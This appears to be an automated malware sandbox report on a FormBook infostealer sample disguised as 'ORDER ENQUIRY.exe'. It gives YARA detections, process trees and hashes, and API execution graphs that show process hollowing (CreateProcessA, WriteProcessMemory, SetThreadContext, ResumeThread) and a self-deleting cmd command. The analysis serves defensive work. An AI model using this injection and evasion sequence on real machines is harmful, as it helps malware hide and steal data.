                                                                                                                                                                        Start time:04:05:05
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\ORDER ENQUIRY.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\ORDER ENQUIRY.exe"
                                                                                                                                                                        Imagebase:0xeb0000
                                                                                                                                                                        File size:695'808 bytes
                                                                                                                                                                        MD5 hash:754FA726BA767C17EBBCE69E967D40CA
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:04:05:05
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                        Imagebase:0x7ff674740000
                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:04:05:08
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                        File size:86'528 bytes
                                                                                                                                                                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:04:05:12
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:/c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:04:05:12
                                                                                                                                                                        Start date:01/10/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.4%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:262
                                                                                                                                                                          Total number of Limit Nodes:13
                                                                                                                                                                          execution_graph 22164 77383b0 22165 77383ce 22164->22165 22166 77383d8 22164->22166 22168 7738403 22165->22168 22169 773840a 22168->22169 22170 7738444 22168->22170 22169->22170 22173 77376d0 22169->22173 22170->22166 22174 7738190 CloseHandle 22173->22174 22175 77381f7 22174->22175 22175->22166 22176 15ed4b8 22177 15ed4fe GetCurrentProcess 22176->22177 22179 15ed549 22177->22179 22180 15ed550 GetCurrentThread 22177->22180 22179->22180 22181 15ed58d GetCurrentProcess 22180->22181 22182 15ed586 22180->22182 22183 15ed5c3 22181->22183 22182->22181 22184 15ed5eb GetCurrentThreadId 22183->22184 22185 15ed61c 22184->22185 22194 15e4668 22195 15e467a 22194->22195 22196 15e4686 22195->22196 22200 15e4778 22195->22200 22205 15e3e1c 22196->22205 22198 15e46a5 22201 15e479d 22200->22201 22211 15e4878 22201->22211 22215 15e4888 22201->22215 22202 15e47a7 22202->22196 22206 15e3e27 22205->22206 22223 15e5c4c 22206->22223 22208 15e6fdc 22227 15e5c5c 22208->22227 22210 15e7000 22210->22198 22213 15e4888 22211->22213 22212 15e498c 22212->22202 22213->22212 22219 15e449c 22213->22219 22216 15e48af 22215->22216 22217 15e498c 22216->22217 22218 15e449c CreateActCtxA 22216->22218 22217->22202 22218->22217 22220 15e5918 CreateActCtxA 22219->22220 22222 15e59db 22220->22222 22224 15e5c57 22223->22224 22225 15e5c5c GetModuleHandleW 22224->22225 22226 15e70c8 22225->22226 22226->22208 22228 15e5c67 22227->22228 22231 15e5c8c 22228->22231 22230 15e716d 22230->22210 22232 15e5c97 22231->22232 22235 15e5cbc 22232->22235 22234 15e7242 22234->22230 22236 15e5cc7 22235->22236 22239 15e5cec 22236->22239 22238 15e7345 22238->22234 22240 15e5cf7 22239->22240 22242 15e864b 22240->22242 22245 15eacf8 22240->22245 22241 15e8689 22241->22238 22242->22241 22250 15ecde0 22242->22250 22246 15eacfd 22245->22246 22255 15ead22 22246->22255 22259 15ead30 22246->22259 22247 15ead0e 22247->22242 22251 15ece11 22250->22251 22252 15ece35 22251->22252 22267 15ecfa0 22251->22267 22271 15ecf91 22251->22271 22252->22241 22256 15ead30 22255->22256 22262 15eae28 22256->22262 22257 15ead3f 22257->22247 22261 15eae28 GetModuleHandleW 22259->22261 22260 15ead3f 22260->22247 22261->22260 22263 15eae39 22262->22263 22264 15eae5c 22262->22264 22263->22264 22265 15eb060 GetModuleHandleW 22263->22265 22264->22257 22266 15eb08d 22265->22266 22266->22257 22269 15ecfad 22267->22269 22268 15ecfe7 22268->22252 22269->22268 22275 15eb800 22269->22275 22271->22271 22272 15ecf9e 22271->22272 22273 15ecfe7 22272->22273 22274 15eb800 GetModuleHandleW 22272->22274 22273->22252 22274->22273 22277 15eb80b 22275->22277 22276 15edcf8 22277->22276 22279 15ed104 22277->22279 22280 15ed10f 22279->22280 22281 15e5cec GetModuleHandleW 22280->22281 22282 15edd67 22281->22282 22282->22276 22283 7733fc5 22284 7733fd6 22283->22284 22291 7734998 22284->22291 22296 7734949 22284->22296 22302 7734897 22284->22302 22308 7734a3e 22284->22308 22314 7734988 22284->22314 22285 7733fe6 22292 77349b2 22291->22292 22293 77349d6 22292->22293 22319 7734d08 22292->22319 22338 7734cf8 22292->22338 22293->22285 22297 7734952 22296->22297 22298 77349a1 22296->22298 22297->22285 22299 77349d6 22298->22299 22300 7734d08 12 API calls 22298->22300 22301 7734cf8 12 API calls 22298->22301 22299->22285 22300->22299 22301->22299 22303 77348b9 22302->22303 22304 7734924 22302->22304 22303->22285 22305 773492f 22304->22305 22306 7734d08 12 API calls 22304->22306 22307 7734cf8 12 API calls 22304->22307 22305->22285 22306->22305 22307->22305 22309 77349cc 22308->22309 22311 7734a41 22308->22311 22312 7734d08 12 API calls 22309->22312 22313 7734cf8 12 API calls 22309->22313 22310 77349d6 22310->22285 22311->22285 22312->22310 22313->22310 22315 77349b2 22314->22315 22316 77349d6 22315->22316 22317 7734d08 12 API calls 22315->22317 22318 7734cf8 12 API calls 22315->22318 22316->22285 22317->22316 22318->22316 22320 7734d1d 22319->22320 22357 77354cf 22320->22357 22362 7735145 22320->22362 22371 7734f85 22320->22371 22376 7735300 22320->22376 22384 77354e2 22320->22384 22393 7734e83 22320->22393 22397 77356bd 22320->22397 22401 773527d 22320->22401 22406 773581e 22320->22406 22411 77357b9 22320->22411 22416 773501b 22320->22416 22421 7734f9b 22320->22421 22426 7734fbb 22320->22426 22431 7734ed6 22320->22431 22436 7734ef7 22320->22436 22440 773508d 22320->22440 22321 7734d2f 22321->22293 22339 7734d1d 22338->22339 22341 7734ef7 2 API calls 22339->22341 22342 7734ed6 2 API calls 22339->22342 22343 7734fbb 2 API calls 22339->22343 22344 7734f9b 2 API calls 22339->22344 22345 773501b 2 API calls 22339->22345 22346 77357b9 2 API calls 22339->22346 22347 773581e 2 API calls 22339->22347 22348 773527d 2 API calls 22339->22348 22349 77356bd 2 API calls 22339->22349 22350 7734e83 2 API calls 22339->22350 22351 77354e2 4 API calls 22339->22351 22352 7735300 4 API calls 22339->22352 22353 7734f85 2 API calls 22339->22353 22354 7735145 4 API calls 22339->22354 22355 77354cf 2 API calls 22339->22355 22356 773508d 4 API calls 22339->22356 22340 7734d2f 22340->22293 22341->22340 22342->22340 22343->22340 22344->22340 22345->22340 22346->22340 22347->22340 22348->22340 22349->22340 22350->22340 22351->22340 22352->22340 22353->22340 22354->22340 22355->22340 22356->22340 22358 7735607 22357->22358 22359 77354dc 22357->22359 22448 7733770 22358->22448 22452 7733778 22358->22452 22365 773515f 22362->22365 22363 77355ca 22363->22321 22364 7734edf 22366 7734fff 22364->22366 22367 7733770 Wow64SetThreadContext 22364->22367 22368 7733778 Wow64SetThreadContext 22364->22368 22365->22363 22365->22364 22456 7733289 22365->22456 22460 7733290 22365->22460 22366->22321 22367->22366 22368->22366 22372 7734f95 22371->22372 22464 7733910 22372->22464 22468 7733909 22372->22468 22373 77353c3 22377 773523a 22376->22377 22378 7734edf 22377->22378 22380 7733290 ResumeThread 22377->22380 22381 7733289 ResumeThread 22377->22381 22379 7734fff 22378->22379 22382 7733770 Wow64SetThreadContext 22378->22382 22383 7733778 Wow64SetThreadContext 22378->22383 22379->22321 22380->22377 22381->22377 22382->22379 22383->22379 22385 77354ef 22384->22385 22386 773523a 22384->22386 22387 7734edf 22386->22387 22391 7733290 ResumeThread 22386->22391 22392 7733289 ResumeThread 22386->22392 22388 7734fff 22387->22388 22389 7733770 Wow64SetThreadContext 22387->22389 22390 7733778 Wow64SetThreadContext 22387->22390 22388->22321 22389->22388 22390->22388 22391->22386 22392->22386 22472 7733b98 22393->22472 22476 7733b8d 22393->22476 22480 7733849 22397->22480 22484 7733850 22397->22484 22398 77356db 22402 7735286 22401->22402 22404 7733910 WriteProcessMemory 22402->22404 22405 7733909 WriteProcessMemory 22402->22405 22403 77352e4 22403->22321 22404->22403 22405->22403 22407 7734edf 22406->22407 22408 7734fff 22407->22408 22409 7733770 Wow64SetThreadContext 22407->22409 22410 7733778 Wow64SetThreadContext 22407->22410 22408->22408 22409->22408 22410->22408 22412 7734edf 22411->22412 22413 7734fff 22412->22413 22414 7733770 Wow64SetThreadContext 22412->22414 22415 7733778 Wow64SetThreadContext 22412->22415 22414->22413 22415->22413 22417 7734edf 22416->22417 22418 7734fff 22417->22418 22419 7733770 Wow64SetThreadContext 22417->22419 22420 7733778 Wow64SetThreadContext 22417->22420 22418->22321 22419->22418 22420->22418 22422 7734edf 22421->22422 22422->22421 22423 7734fff 22422->22423 22424 7733770 Wow64SetThreadContext 22422->22424 22425 7733778 Wow64SetThreadContext 22422->22425 22424->22423 22425->22423 22427 7734fde 22426->22427 22429 7733910 WriteProcessMemory 22427->22429 22430 7733909 WriteProcessMemory 22427->22430 22428 7734f7a 22428->22321 22429->22428 22430->22428 22432 7734edf 22431->22432 22433 7734fff 22432->22433 22434 7733770 Wow64SetThreadContext 22432->22434 22435 7733778 Wow64SetThreadContext 22432->22435 22434->22433 22435->22433 22488 7733a00 22436->22488 22492 77339f8 22436->22492 22437 7734f19 22437->22321 22441 7735239 22440->22441 22442 7734edf 22441->22442 22444 7733290 ResumeThread 22441->22444 22445 7733289 ResumeThread 22441->22445 22443 7734fff 22442->22443 22446 7733770 Wow64SetThreadContext 22442->22446 22447 7733778 Wow64SetThreadContext 22442->22447 22443->22321 22444->22441 22445->22441 22446->22443 22447->22443 22449 7733778 Wow64SetThreadContext 22448->22449 22451 7733805 22449->22451 22451->22359 22453 77337bd Wow64SetThreadContext 22452->22453 22455 7733805 22453->22455 22455->22359 22457 77332d0 ResumeThread 22456->22457 22459 7733301 22457->22459 22459->22365 22461 77332d0 ResumeThread 22460->22461 22463 7733301 22461->22463 22463->22365 22465 7733958 WriteProcessMemory 22464->22465 22467 77339af 22465->22467 22467->22373 22469 7733910 WriteProcessMemory 22468->22469 22471 77339af 22469->22471 22471->22373 22473 7733c21 22472->22473 22473->22473 22474 7733d86 CreateProcessA 22473->22474 22475 7733de3 22474->22475 22475->22475 22477 7733b98 22476->22477 22477->22477 22478 7733d86 CreateProcessA 22477->22478 22479 7733de3 22478->22479 22479->22479 22481 7733850 VirtualAllocEx 22480->22481 22483 77338cd 22481->22483 22483->22398 22485 7733890 VirtualAllocEx 22484->22485 22487 77338cd 22485->22487 22487->22398 22489 7733a4b ReadProcessMemory 22488->22489 22491 7733a8f 22489->22491 22491->22437 22493 7733a01 ReadProcessMemory 22492->22493 22495 7733a8f 22493->22495 22495->22437 22186 7735c78 22187 7735e03 22186->22187 22188 7735c9e 22186->22188 22188->22187 22190 7731cf0 22188->22190 22191 7736300 PostMessageW 22190->22191 22193 773636c 22191->22193 22193->22188 22496 15ed700 DuplicateHandle 22497 15ed796 22496->22497

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 294 15ed4a8-15ed547 GetCurrentProcess 299 15ed549-15ed54f 294->299 300 15ed550-15ed584 GetCurrentThread 294->300 299->300 301 15ed58d-15ed5c1 GetCurrentProcess 300->301 302 15ed586-15ed58c 300->302 304 15ed5ca-15ed5e5 call 15ed688 301->304 305 15ed5c3-15ed5c9 301->305 302->301 308 15ed5eb-15ed61a GetCurrentThreadId 304->308 305->304 309 15ed61c-15ed622 308->309 310 15ed623-15ed685 308->310 309->310
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 015ED536
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 015ED573
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 015ED5B0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 015ED609
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: 84a45ab569effaf2bc9a9a142ccb18701686e34704019d89a6e5f59a1db05f91
                                                                                                                                                                          • Instruction ID: 7347bf96d7f4840b4d5aabe93118b0f9f04510d46593ca484c01e2e48c5a83b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 84a45ab569effaf2bc9a9a142ccb18701686e34704019d89a6e5f59a1db05f91
                                                                                                                                                                          • Instruction Fuzzy Hash: 765156B0D003098FDB18DFAAD548BAEBFF1FF49314F24845AE019A72A0D7349984CB65

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 317 15ed4b8-15ed547 GetCurrentProcess 321 15ed549-15ed54f 317->321 322 15ed550-15ed584 GetCurrentThread 317->322 321->322 323 15ed58d-15ed5c1 GetCurrentProcess 322->323 324 15ed586-15ed58c 322->324 326 15ed5ca-15ed5e5 call 15ed688 323->326 327 15ed5c3-15ed5c9 323->327 324->323 330 15ed5eb-15ed61a GetCurrentThreadId 326->330 327->326 331 15ed61c-15ed622 330->331 332 15ed623-15ed685 330->332 331->332
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 015ED536
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 015ED573
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 015ED5B0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 015ED609
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: bd2d0597bcbf12463b0261a4d997fe6a7577bbb26e79526a6ef7c5976200f585
                                                                                                                                                                          • Instruction ID: 96024043d37e16f9d9c96dd7d3aece1f2eec99b2c31090ac4925aac7f772fe10
                                                                                                                                                                          • Opcode Fuzzy Hash: bd2d0597bcbf12463b0261a4d997fe6a7577bbb26e79526a6ef7c5976200f585
                                                                                                                                                                          • Instruction Fuzzy Hash: E15123B0D002098FDB18DFAAD548BAEBBF5FF49314F208459E509B7260D778A984CF65

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 426 7733b8d-7733c2d 429 7733c66-7733c86 426->429 430 7733c2f-7733c39 426->430 437 7733c88-7733c92 429->437 438 7733cbf-7733cee 429->438 430->429 431 7733c3b-7733c3d 430->431 432 7733c60-7733c63 431->432 433 7733c3f-7733c49 431->433 432->429 435 7733c4b 433->435 436 7733c4d-7733c5c 433->436 435->436 436->436 439 7733c5e 436->439 437->438 440 7733c94-7733c96 437->440 444 7733cf0-7733cfa 438->444 445 7733d27-7733de1 CreateProcessA 438->445 439->432 442 7733cb9-7733cbc 440->442 443 7733c98-7733ca2 440->443 442->438 446 7733ca6-7733cb5 443->446 447 7733ca4 443->447 444->445 448 7733cfc-7733cfe 444->448 458 7733de3-7733de9 445->458 459 7733dea-7733e70 445->459 446->446 449 7733cb7 446->449 447->446 450 7733d21-7733d24 448->450 451 7733d00-7733d0a 448->451 449->442 450->445 453 7733d0e-7733d1d 451->453 454 7733d0c 451->454 453->453 455 7733d1f 453->455 454->453 455->450 458->459 469 7733e72-7733e76 459->469 470 7733e80-7733e84 459->470 469->470 471 7733e78 469->471 472 7733e86-7733e8a 470->472 473 7733e94-7733e98 470->473 471->470 472->473 474 7733e8c 472->474 475 7733e9a-7733e9e 473->475 476 7733ea8-7733eac 473->476 474->473 475->476 477 7733ea0 475->477 478 7733ebe-7733ec5 476->478 479 7733eae-7733eb4 476->479 477->476 480 7733ec7-7733ed6 478->480 481 7733edc 478->481 479->478 480->481 483 7733edd 481->483 483->483
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07733DCE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                          • Opcode ID: d5d886bb7611c5d5f9aeae44ffc3783e88fcec1c8ef237ea3aac37a914532836
                                                                                                                                                                          • Instruction ID: 1aecdfa70c6ca2313338ed50bf8b8609565d8c5d061f6ad6a8edce2cff3c1528
                                                                                                                                                                          • Opcode Fuzzy Hash: d5d886bb7611c5d5f9aeae44ffc3783e88fcec1c8ef237ea3aac37a914532836
                                                                                                                                                                          • Instruction Fuzzy Hash: 92A16BB1D0021ACFDB24CFA8C840BEDBBB2BF44314F1485A9D808A7281DB759985CF92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 484 7733b98-7733c2d 486 7733c66-7733c86 484->486 487 7733c2f-7733c39 484->487 494 7733c88-7733c92 486->494 495 7733cbf-7733cee 486->495 487->486 488 7733c3b-7733c3d 487->488 489 7733c60-7733c63 488->489 490 7733c3f-7733c49 488->490 489->486 492 7733c4b 490->492 493 7733c4d-7733c5c 490->493 492->493 493->493 496 7733c5e 493->496 494->495 497 7733c94-7733c96 494->497 501 7733cf0-7733cfa 495->501 502 7733d27-7733de1 CreateProcessA 495->502 496->489 499 7733cb9-7733cbc 497->499 500 7733c98-7733ca2 497->500 499->495 503 7733ca6-7733cb5 500->503 504 7733ca4 500->504 501->502 505 7733cfc-7733cfe 501->505 515 7733de3-7733de9 502->515 516 7733dea-7733e70 502->516 503->503 506 7733cb7 503->506 504->503 507 7733d21-7733d24 505->507 508 7733d00-7733d0a 505->508 506->499 507->502 510 7733d0e-7733d1d 508->510 511 7733d0c 508->511 510->510 512 7733d1f 510->512 511->510 512->507 515->516 526 7733e72-7733e76 516->526 527 7733e80-7733e84 516->527 526->527 528 7733e78 526->528 529 7733e86-7733e8a 527->529 530 7733e94-7733e98 527->530 528->527 529->530 531 7733e8c 529->531 532 7733e9a-7733e9e 530->532 533 7733ea8-7733eac 530->533 531->530 532->533 534 7733ea0 532->534 535 7733ebe-7733ec5 533->535 536 7733eae-7733eb4 533->536 534->533 537 7733ec7-7733ed6 535->537 538 7733edc 535->538 536->535 537->538 540 7733edd 538->540 540->540
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07733DCE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                          • Opcode ID: 8b4c643b53ddc691471082203d8dc1e058d3bf30362e60741e9b451b8446327b
                                                                                                                                                                          • Instruction ID: b2a1f5bd7852d3194c437a6d6436a925cbd0cc0e6c631c1e6461978c71020e03
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4c643b53ddc691471082203d8dc1e058d3bf30362e60741e9b451b8446327b
                                                                                                                                                                          • Instruction Fuzzy Hash: F3915CB1D0031ACFDB24DFA8C840BDDBBB2BF44310F1485A9D818A7281DB759985CF92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 541 15eae28-15eae37 542 15eae39-15eae46 call 15ea180 541->542 543 15eae63-15eae67 541->543 549 15eae5c 542->549 550 15eae48 542->550 545 15eae7b-15eaebc 543->545 546 15eae69-15eae73 543->546 552 15eaebe-15eaec6 545->552 553 15eaec9-15eaed7 545->553 546->545 549->543 596 15eae4e call 15eb0c0 550->596 597 15eae4e call 15eb0b0 550->597 552->553 554 15eaefb-15eaefd 553->554 555 15eaed9-15eaede 553->555 560 15eaf00-15eaf07 554->560 557 15eaee9 555->557 558 15eaee0-15eaee7 call 15ea18c 555->558 556 15eae54-15eae56 556->549 559 15eaf98-15eb058 556->559 562 15eaeeb-15eaef9 557->562 558->562 591 15eb05a-15eb05d 559->591 592 15eb060-15eb08b GetModuleHandleW 559->592 563 15eaf09-15eaf11 560->563 564 15eaf14-15eaf1b 560->564 562->560 563->564 567 15eaf1d-15eaf25 564->567 568 15eaf28-15eaf31 call 15ea19c 564->568 567->568 572 15eaf3e-15eaf43 568->572 573 15eaf33-15eaf3b 568->573 574 15eaf45-15eaf4c 572->574 575 15eaf61-15eaf6e 572->575 573->572 574->575 577 15eaf4e-15eaf5e call 15ea1ac call 15ea1bc 574->577 582 15eaf70-15eaf8e 575->582 583 15eaf91-15eaf97 575->583 577->575 582->583 591->592 593 15eb08d-15eb093 592->593 594 15eb094-15eb0a8 592->594 593->594 596->556 597->556
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 015EB07E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
